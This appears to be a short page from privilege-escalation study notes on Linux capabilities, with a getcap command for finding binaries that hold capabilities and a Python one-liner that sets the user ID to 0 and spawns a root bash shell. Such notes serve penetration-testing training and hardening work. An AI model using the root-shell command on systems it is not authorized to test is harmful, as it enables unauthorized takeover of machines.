Capabilities

"Better" than SUID but vulnerable in the same way

What are Capabilities?

capabilities(7) - Linux manual page
Capabilities man page

In short, "capability" is a "safer" version of SUID. However, it is still vulnerable in certain cases.

Enumeration

Search for capabilities:

getcap -r / 2>/dev/null

Python Capabilities

Suppose /usr/bin/python2.6 has all capabilities:

Python capabilities

Spawn a root shell:

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
PreviousSUIDNextCron Jobs

Last updated

Was this helpful?